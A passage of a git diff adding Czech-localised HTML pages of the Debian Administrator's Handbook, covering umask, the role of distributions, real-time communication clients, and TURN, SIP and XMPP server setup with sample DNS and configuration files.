+              class="command">umask</code> in a shell; you will see a mask such as <code
+              class="computeroutput">0022</code>. This is simply an octal representation of the rights to be systematically removed (in this case, the write right for the group and other users).
+		</div><a
+            id="id-1.12.6.35.3"
+            class="indexterm"></a><a
+            id="id-1.12.6.35.4"
+            class="indexterm"></a><a
+            id="id-1.12.6.35.5"
+            class="indexterm"></a><div
+            class="para">
+			If you give it a new octal value, the <code
+              class="command">umask</code> command modifies the mask. Used in a shell initialization file (for example, <code
+              class="filename">~/.bash_profile</code>), it will effectively change the default mask for your work sessions.
+		</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.remote-login.html"><strong>Předcházející</strong>9.2. Remote Login</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.administration-interfaces.html"><strong>Další</strong>9.4. Administration Interfaces</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.role-of-distributions.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.role-of-distributions.html
new file mode 100644
index 000000000..cfc72b16d
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.role-of-distributions.html
@@ -0,0 +1,115 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">1.5. The Role of Distributions</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Cíl, Prostředky, Operace, Dobrovolník" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="the-debian-project.html"
+        title="Kapitola 1. Projekt Debian" /><link
+        rel="prev"
+        href="sect.follow-debian-news.html"
+        title="1.4. Follow Debian News" /><link
+        rel="next"
+        href="sect.release-lifecycle.html"
+        title="1.6. Lifecycle of a Release" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.role-of-distributions.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.follow-debian-news.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.release-lifecycle.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.role-of-distributions"></a>1.5. The Role of Distributions</h2></div></div></div><a
+          id="id-1.4.8.2"
+          class="indexterm"></a><div
+          class="para">
+			A GNU/Linux distribution has two main objectives: install a free operating system on a computer (either with or without an existing system or systems), and provide a range of software covering all of the users' needs.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.4.8.4"></a>1.5.1. The Installer: <code
+                    class="command">debian-installer</code></h3></div></div></div><div
+            class="para">
+				The <code
+              class="command">debian-installer</code>, designed to be extremely modular in order to be as generic as possible, targets the first objective. It covers a broad range of installation situations and in general, greatly facilitates the creation of a derivative installer corresponding to a particular case.
+			</div><div
+            class="para">
+				This modularity, which also makes it very complex, may be daunting for the developers discovering this tool; but whether used in graphical or text mode, the user's experience is still similar. Great efforts have been made to reduce the number of questions asked at installation time, in particular thanks to the inclusion of automatic hardware detection software.
+			</div><div
+            class="para">
+				It is interesting to note that distributions derived from Debian differ greatly on this aspect, and provide a more limited installer (often confined to the i386 or amd64 architectures), but more user-friendly for the uninitiated. On the other hand, they usually refrain from straying too far from package contents in order to benefit as much as possible from the vast range of software offered without causing compatibility problems.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.4.8.5"></a>1.5.2. The Software Library</h3></div></div></div><div
+            class="para">
+				Quantitatively, Debian is undeniably the leader in this respect, with over 25,000 source packages. Qualitatively, Debian’s policy and long testing period prior to releasing a new stable version justify its reputation for stability and consistency. As far as availability, everything is available on-line through many mirrors worldwide, with updates pushed out every six hours.
+			</div><div
+            class="para">
+				Many retailers sell DVD-ROMs on the Internet at a very low price (often at cost), the “images” for which are freely available for download. There is only one drawback: the low frequency of releases of new stable versions (their development sometimes takes more than two years), which delays the inclusion of new software.
+			</div><div
+            class="para">
+				Most new free software programs quickly find their way into the development version which allows them to be installed. If this requires too many updates due to their dependencies, the program can also be recompiled for the stable version of Debian (see <a
+              class="xref"
+              href="debian-packaging.html">15 – „<em>Creating a Debian Package</em>“</a> for more information on this topic).
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.follow-debian-news.html"><strong>Předcházející</strong>1.4. Follow Debian News</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.release-lifecycle.html"><strong>Další</strong>1.6. Lifecycle of a Release</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.rtc-clients.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.rtc-clients.html
new file mode 100644
index 000000000..787474b53
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.rtc-clients.html
@@ -0,0 +1,199 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">13.10. Real-Time Communications software</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Workstation, Graphical desktop, Office work, X.org" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="workstation.html"
+        title="Kapitola 13. Workstation" /><link
+        rel="prev"
+        href="sect.windows-emulation.html"
+        title="13.9. Emulating Windows: Wine" /><link
+        rel="next"
+        href="security.html"
+        title="Kapitola 14. Security" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.rtc-clients.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.windows-emulation.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="security.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.rtc-clients"></a>13.10. Real-Time Communications software</h2></div></div></div><div
+          class="para">
+			Debian provides a wide range of Real-Time Communications (RTC) client software. The setup of RTC servers is discussed in <a
+            class="xref"
+            href="sect.rtc-services.html">11.8 – „Real-Time Communication Services“</a>. In SIP terminology, a client application or device is also referred to as a user agent.
+		</div><a
+          id="id-1.16.13.3"
+          class="indexterm"></a><a
+          id="id-1.16.13.4"
+          class="indexterm"></a><div
+          class="para">
+			Each client application varies in functionality. Some applications are more convenient for intensive chat users while other applications are more stable for webcam users. It may be necessary to test several applications to identify those which are most satisfactory. A user may finally decide that they need more than one application, for example, an XMPP application for messaging with customers and an IRC application for collaboration with some online communities.
+		</div><div
+          class="para">
+			To maximize the ability of users to communicate with the wider world, it is recommended to configure both SIP and XMPP clients or a single client that supports both protocols.
+		</div><a
+          id="id-1.16.13.7"
+          class="indexterm"></a><a
+          id="id-1.16.13.8"
+          class="indexterm"></a><div
+          class="para">
+			The default GNOME desktop suggests the Empathy communications client. Empathy can support both SIP and XMPP. It supports instant messaging (IM), voice and video. The KDE project provides KDE Telepathy, a communications client based on the same underlying Telepathy APIs used by the GNOME Empathy client.
+		</div><a
+          id="id-1.16.13.10"
+          class="indexterm"></a><a
+          id="id-1.16.13.11"
+          class="indexterm"></a><div
+          class="para">
+			Popular alternatives to Empathy/Telepathy include Ekiga, Linphone, Psi and Ring (formerly known as SFLphone).
+		</div><a
+          id="id-1.16.13.13"
+          class="indexterm"></a><a
+          id="id-1.16.13.14"
+          class="indexterm"></a><a
+          id="id-1.16.13.15"
+          class="indexterm"></a><a
+          id="id-1.16.13.16"
+          class="indexterm"></a><a
+          id="id-1.16.13.17"
+          class="indexterm"></a><div
+          class="para">
+			Some of these applications can also interact with mobile users using apps such as Lumicall on Android. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://lumicall.org">https://lumicall.org</a></div>
+		</div><a
+          id="id-1.16.13.19"
+          class="indexterm"></a><div
+          class="para">
+			The <span
+            class="emphasis"><em>Real-Time Communications Quick Start Guide</em></span> has a chapter dedicated to client software. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://rtcquickstart.org/guide/multi/useragents.html">http://rtcquickstart.org/guide/multi/useragents.html</a></div>
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>TIP</em></span> Look for clients supporting ICE and TURN</strong></p></div></div></div><div
+            class="para">
+			Some RTC clients have significant problems sending voice and video through firewalls and NAT networks. Users may receive ghost calls (their phone rings but they don't hear the other person) or they may not be able to call at all.
+		</div><div
+            class="para">
+			The ICE and TURN protocols were developed to resolve these issues. Operating a TURN server with public IP addresses in each site and using client software that supports both ICE and TURN gives the best user experience.
+		</div><div
+            class="para">
+			If the client software is only intended for instant messaging, there is no requirement for ICE or TURN support.
+		</div></div><div
+          class="para">
+			Debian Developers operate a community SIP service at <a
+            href="https://rtc.debian.org">rtc.debian.org</a>. The community maintains a wiki with documentation about setting up many of the client applications packaged in Debian. The wiki articles and screenshots are a useful resource for anybody setting up a similar service on their own domain. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://wiki.debian.org/UnifiedCommunications/DebianDevelopers/UserGuide">https://wiki.debian.org/UnifiedCommunications/DebianDevelopers/UserGuide</a></div>
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>ALTERNATIVE</em></span> Internet Relay Chat</strong></p></div></div></div><div
+            class="para">
+			IRC can also be considered, in addition to SIP and XMPP. IRC is more oriented around the concept of channels, the name of which starts with a hash sign <code
+              class="literal">#</code>. Each channel is usually targeted at a specific topic and any number of people can join a channel to discuss it (but users can still have one-to-one private conversations if needed). The IRC protocol is older, and does not allow end-to-end encryption of the messages; it is still possible to encrypt the communications between the users and the server by tunneling the IRC protocol inside SSL.
+		</div><a
+            id="id-1.16.13.23.3"
+            class="indexterm"></a><a
+            id="id-1.16.13.23.4"
+            class="indexterm"></a><div
+            class="para">
+			IRC clients are a bit more complex, and they usually provide many features that are of limited use in a corporate environment. For instance, channel “operators” are users endowed with the ability to kick other users from a channel, or even ban them permanently, when the normal discussion is disrupted.
+		</div><div
+            class="para">
+			Since the IRC protocol is very old, many clients are available to cater for many user groups; examples include XChat (only available in <span
+              class="distribution distribution">stretch-backports</span>, not in <span
+              class="distribution distribution">stretch</span>), and Smuxi (graphical clients based on GTK+), Irssi (text mode), Circe (integrated to Emacs), and so on.
+		</div></div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>QUICK LOOK</em></span> Video conferencing with Ekiga</strong></p></div></div></div><div
+            class="para">
+			Ekiga (formerly GnomeMeeting) is a prominent application for Linux video conferencing. It is both stable and functional, and is very easily used on a local network; setting up the service on a global network is much more complex when the firewalls involved lack explicit support for the H323 and/or SIP teleconferencing protocols with all their quirks.
+		</div><a
+            id="id-1.16.13.24.3"
+            class="indexterm"></a><a
+            id="id-1.16.13.24.4"
+            class="indexterm"></a><div
+            class="para">
+			If only one Ekiga client is to run behind the firewall, the configuration is rather straightforward, and only involves forwarding a few ports to the dedicated host: TCP port 1720 (listening for incoming connections), TCP port 5060 (for SIP), TCP ports 30000 to 30010 (for control of open connections) and UDP ports 5000 to 5100 (for audio and video data transmission and registration to an H323 proxy).
+		</div><a
+            id="id-1.16.13.24.6"
+            class="indexterm"></a><a
+            id="id-1.16.13.24.7"
+            class="indexterm"></a><div
+            class="para">
+			When several Ekiga clients are to run behind the firewall, complexity increases notably. An H323 proxy (for instance the <span
+              class="pkg pkg">gnugk</span> package) must be set up, and its configuration is far from simple.
+		</div><a
+            id="id-1.16.13.24.9"
+            class="indexterm"></a></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.windows-emulation.html"><strong>Předcházející</strong>13.9. Emulating Windows: Wine</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="security.html"><strong>Další</strong>Kapitola 14. Security</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.rtc-services.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.rtc-services.html
new file mode 100644
index 000000000..5c70111c3
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.rtc-services.html
@@ -0,0 +1,524 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">11.8. Real-Time Communication Services</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Postfix, Apache, NFS, Samba, Squid, OpenLDAP, SIP" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="network-services.html"
+        title="Kapitola 11. Network Services: Postfix, Apache, NFS, Samba, Squid, LDAP, SIP, XMPP, TURN" /><link
+        rel="prev"
+        href="sect.ldap-directory.html"
+        title="11.7. LDAP Directory" /><link
+        rel="next"
+        href="advanced-administration.html"
+        title="Kapitola 12. Advanced Administration" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.rtc-services.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.ldap-directory.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="advanced-administration.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.rtc-services"></a>11.8. Real-Time Communication Services</h2></div></div></div><div
+          class="para">
+			Real-Time Communication (RTC) services include voice, video/webcam, instant messaging (IM) and desktop sharing. This chapter gives a brief introduction to three of the services required to operate RTC, including a TURN server, SIP server and XMPP server. Comprehensive details of how to plan, install and manage these services are available in the Real-Time Communications Quick Start Guide which includes examples specific to Debian. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://rtcquickstart.org">http://rtcquickstart.org</a></div>
+		</div><a
+          id="id-1.14.11.3"
+          class="indexterm"></a><a
+          id="id-1.14.11.4"
+          class="indexterm"></a><a
+          id="id-1.14.11.5"
+          class="indexterm"></a><a
+          id="id-1.14.11.6"
+          class="indexterm"></a><div
+          class="para">
+			Both SIP and XMPP can provide the same functionality. SIP is slightly more well known for voice and video while XMPP is traditionally regarded as an IM protocol. In fact, they can both be used for any of these purposes. To maximize connectivity options, it is recommended to run both in parallel.
+		</div><a
+          id="id-1.14.11.8"
+          class="indexterm"></a><a
+          id="id-1.14.11.9"
+          class="indexterm"></a><div
+          class="para">
+			These services rely on X.509 certificates both for authentication and confidentiality purposes. See <a
+            class="xref"
+            href="sect.virtual-private-network.html#sect.easy-rsa">10.2.1.1 – „Public Key Infrastructure: <span
+              class="emphasis"><em>easy-rsa</em></span>“</a> for details on how to create them. Alternatively the <span
+            class="emphasis"><em>Real-Time Communications Quick Start Guide</em></span> also has some useful explanations: <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://rtcquickstart.org/guide/multi/tls.html">http://rtcquickstart.org/guide/multi/tls.html</a></div>
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.rtc-dns-settings"></a>11.8.1. DNS settings for RTC services</h3></div></div></div><div
+            class="para">
+				RTC services require DNS SRV and NAPTR records. A sample configuration that can be placed in the zone file for <code
+              class="literal">falcot.com</code>:
+			</div><a
+            id="id-1.14.11.11.3"
+            class="indexterm"></a><a
+            id="id-1.14.11.11.4"
+            class="indexterm"></a><pre
+            class="programlisting">
+; the server where everything will run
+server1            IN     A      198.51.100.19
+server1            IN     AAAA   2001:DB8:1000:2000::19
+
+; IPv4 only for TURN for now, some clients are buggy with IPv6
+turn-server        IN     A      198.51.100.19
+
+; IPv4 and IPv6 addresses for SIP
+sip-proxy          IN     A      198.51.100.19
+sip-proxy          IN     AAAA   2001:DB8:1000:2000::19
+
+; IPv4 and IPv6 addresses for XMPP
+xmpp-gw            IN     A      198.51.100.19
+xmpp-gw            IN     AAAA   2001:DB8:1000:2000::19
+
+; DNS SRV and NAPTR for STUN / TURN
+_stun._udp  IN SRV    0 1 3467 turn-server.falcot.com.
+_turn._udp  IN SRV    0 1 3467 turn-server.falcot.com.
+@           IN NAPTR  10 0 "s" "RELAY:turn.udp" "" _turn._udp.falcot.com.
+
+; DNS SRV and NAPTR records for SIP
+_sips._tcp  IN SRV    0 1 5061 sip-proxy.falcot.com.
+@           IN NAPTR  10 0 "s" "SIPS+D2T" "" _sips._tcp.falcot.com.
+
+; DNS SRV records for XMPP Server and Client modes:
+_xmpp-client._tcp  IN     SRV    5 0 5222 xmpp-gw.falcot.com.
+_xmpp-server._tcp  IN     SRV    5 0 5269 xmpp-gw.falcot.com.
+</pre></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.turn-server"></a>11.8.2. TURN Server</h3></div></div></div><div
+            class="para">
+				TURN is a service that helps clients behind NAT routers and firewalls to discover the most efficient way to communicate with other clients and to relay the media streams if no direct media path can be found. It is highly recommended that the TURN server is installed before any of the other RTC services are offered to end users.
+			</div><a
+            id="id-1.14.11.12.3"
+            class="indexterm"></a><div
+            class="para">
+				TURN and the related ICE protocol are open standards. To benefit from these protocols, maximizing connectivity and minimizing user frustration, it is important to ensure that all client software supports ICE and TURN.
+			</div><a
+            id="id-1.14.11.12.5"
+            class="indexterm"></a><div
+            class="para">
+				For the ICE algorithm to work effectively, the server must have two public IPv4 addresses.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.turn-server-install"></a>11.8.2.1. Install the TURN server</h4></div></div></div><div
+              class="para">
+					Install the <span
+                class="pkg pkg">resiprocate-turn-server</span> package.
+				</div><div
+              class="para">
+					Edit the <code
+                class="filename">/etc/reTurn/reTurnServer.config</code> configuration file. The most important thing to do is insert the IP addresses of the server.
+				</div><pre
+              class="programlisting">
+# your IP addresses go here:
+TurnAddress = 198.51.100.19
+TurnV6Address = 2001:DB8:1000:2000::19
+AltStunAddress = 198.51.100.20
+# your domain goes here, it must match the value used
+# to hash your passwords if they are already hashed
+# using the HA1 algorithm:
+AuthenticationRealm = myrealm
+
+UserDatabaseFile = /etc/reTurn/users.txt
+UserDatabaseHashedPasswords = true
+</pre><div
+              class="para">
+					Restart the service.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.turn-server-management"></a>11.8.2.2. Managing the TURN users</h4></div></div></div><div
+              class="para">
+					Use the htdigest utility to manage the TURN server user list.
+				</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>htdigest /etc/reTurn/users.txt myrealm joe</code></strong></pre><div
+              class="para">
+					Use the HUP signal to make the server reload the <code
+                class="filename">/etc/reTurn/users.txt</code> file after changing it or enable the automatic reload feature in <code
+                class="filename">/etc/reTurn/reTurnServer.config</code>.
+				</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.sip-server"></a>11.8.3. SIP Proxy Server</h3></div></div></div><div
+            class="para">
+				A SIP proxy server manages the incoming and outgoing SIP connections between other organizations, SIP trunking providers, SIP PBXes such as Asterisk, SIP phones, SIP-based softphones and WebRTC applications.
+			</div><a
+            id="id-1.14.11.13.3"
+            class="indexterm"></a><a
+            id="id-1.14.11.13.4"
+            class="indexterm"></a><a
+            id="id-1.14.11.13.5"
+            class="indexterm"></a><a
+            id="id-1.14.11.13.6"
+            class="indexterm"></a><div
+            class="para">
+				It is strongly recommended to install and configure the SIP proxy before attempting a SIP PBX setup. The SIP proxy normalizes a lot of the traffic reaching the PBX and provides greater connectivity and resilience.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.sip-server-install"></a>11.8.3.1. Install the SIP proxy</h4></div></div></div><div
+              class="para">
+					Install the <span
+                class="pkg pkg">repro</span> package. Using the package from <span
+                class="distribution distribution">jessie-backports</span> is highly recommended, as it has the latest improvements for maximizing connectivity and resilience.
+				</div><a
+              id="id-1.14.11.13.8.3"
+              class="indexterm"></a><div
+              class="para">
+					Edit the <code
+                class="filename">/etc/repro/repro.config</code> configuration file. The most important thing to do is insert the IP addresses of the server. The example below demonstrates how to setup both regular SIP and WebSockets/WebRTC, using TLS, IPv4 and IPv6:
+				</div><pre
+              class="programlisting">
+# Transport1 will be for SIP over TLS connections
+# We use port 5061 here but if you have clients connecting from
+# locations with firewalls you could change this to listen on port 443
+Transport1Interface = 198.51.100.19:5061
+Transport1Type = TLS
+Transport1TlsDomain = falcot.com
+Transport1TlsClientVerification = Optional
+Transport1RecordRouteUri = sip:falcot.com;transport=TLS
+Transport1TlsPrivateKey = /etc/ssl/private/falcot.com-key.pem
+Transport1TlsCertificate = /etc/ssl/public/falcot.com.pem
+
+# Transport2 is the IPv6 version of Transport1
+Transport2Interface = 2001:DB8:1000:2000::19:5061
+Transport2Type = TLS
+Transport2TlsDomain = falcot.com
+Transport2TlsClientVerification = Optional
+Transport2RecordRouteUri = sip:falcot.com;transport=TLS
+Transport2TlsPrivateKey = /etc/ssl/private/falcot.com-key.pem
+Transport2TlsCertificate = /etc/ssl/public/falcot.com.pem
+
+# Transport3 will be for SIP over WebSocket (WebRTC) connections
+# We use port 8443 here but you could use 443 instead
+Transport3Interface = 198.51.100.19:8443
+Transport3Type = WSS
+Transport3TlsDomain = falcot.com
+# This would require the browser to send a certificate, but browsers
+# don't currently appear to be able to, so leave it as None:
+Transport3TlsClientVerification = None
+Transport3RecordRouteUri = sip:falcot.com;transport=WSS
+Transport3TlsPrivateKey = /etc/ssl/private/falcot.com-key.pem
+Transport3TlsCertificate = /etc/ssl/public/falcot.com.pem
+
+# Transport4 is the IPv6 version of Transport3
+Transport4Interface = 2001:DB8:1000:2000::19:8443
+Transport4Type = WSS
+Transport4TlsDomain = falcot.com
+Transport4TlsClientVerification = None
+Transport4RecordRouteUri = sip:falcot.com;transport=WSS
+Transport4TlsPrivateKey = /etc/ssl/private/falcot.com-key.pem
+Transport4TlsCertificate = /etc/ssl/public/falcot.com.pem
+
+# Transport5: this could be for TCP connections to an Asterisk server
+# in your internal network.  Don't allow port 5060 through the external
+# firewall.
+Transport5Interface = 198.51.100.19:5060
+Transport5Type = TCP
+Transport5RecordRouteUri = sip:198.51.100.19:5060;transport=TCP
+
+HttpBindAddress = 198.51.100.19, 2001:DB8:1000:2000::19
+HttpAdminUserFile = /etc/repro/users.txt
+
+RecordRouteUri = sip:falcot.com;transport=tls
+ForceRecordRouting = true
+EnumSuffixes = e164.arpa, sip5060.net, e164.org
+DisableOutbound = false
+EnableFlowTokens = true
+EnableCertificateAuthenticator = True
+</pre><div
+              class="para">
+					Use the <code
+                class="command">htdigest</code> utility to manage the admin password for the web interface. The username must be <span
+                class="emphasis"><em>admin</em></span> and the realm name must match the value specified in <code
+                class="filename">repro.config</code>.
+				</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>htdigest /etc/repro/users.txt repro admin</code></strong></pre><div
+              class="para">
+					Restart the service to use the new configuration.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.sip-server-management"></a>11.8.3.2. Managing the SIP proxy</h4></div></div></div><div
+              class="para">
+					Go to the web interface at <code
+                class="literal">http://sip-proxy.falcot.com:5080</code> to complete the configuration by adding domains, local users and static routes.
+				</div><div
+              class="para">
+					The first step is to add the local domain. The process must be restarted after adding or removing domains from the list.
+				</div><div
+              class="para">
+					The proxy knows how to route calls between local users and full SIP address, the routing configuration is only necessary for overriding default behavior, for example, to recognize phone numbers, add a prefix and route them to a SIP provider.
+				</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.xmpp-server"></a>11.8.4. XMPP Server</h3></div></div></div><div
+            class="para">
+				An XMPP server manages connectivity between local XMPP users and XMPP users in other domains on the public Internet.
+			</div><a
+            id="id-1.14.11.14.3"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>VOCABULARY</em></span> XMPP or Jabber?</strong></p></div></div></div><a
+              id="id-1.14.11.14.4.2"
+              class="indexterm"></a><div
+              class="para">
+				XMPP is sometimes referred to as Jabber. In fact, Jabber is a trademark and XMPP is the official name of the standard.
+			</div><a
+              id="id-1.14.11.14.4.4"
+              class="indexterm"></a></div><div
+            class="para">
+				Prosody is a popular XMPP server that operates reliably on Debian servers.
+			</div><a
+            id="id-1.14.11.14.6"
+            class="indexterm"></a><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.xmpp-server-install"></a>11.8.4.1. Install the XMPP server</h4></div></div></div><div
+              class="para">
+					Install the <span
+                class="pkg pkg">prosody</span> package. Using the package from <span
+                class="distribution distribution">jessie-backports</span> is highly recommended, as it has the latest improvements for maximizing connectivity and resilience.
+				</div><a
+              id="id-1.14.11.14.7.3"
+              class="indexterm"></a><div
+              class="para">
+					Review the <code
+                class="filename">/etc/prosody/prosody.cfg.lua</code> configuration file. The most important thing to do is insert JIDs of the users who are permitted to manage the server.
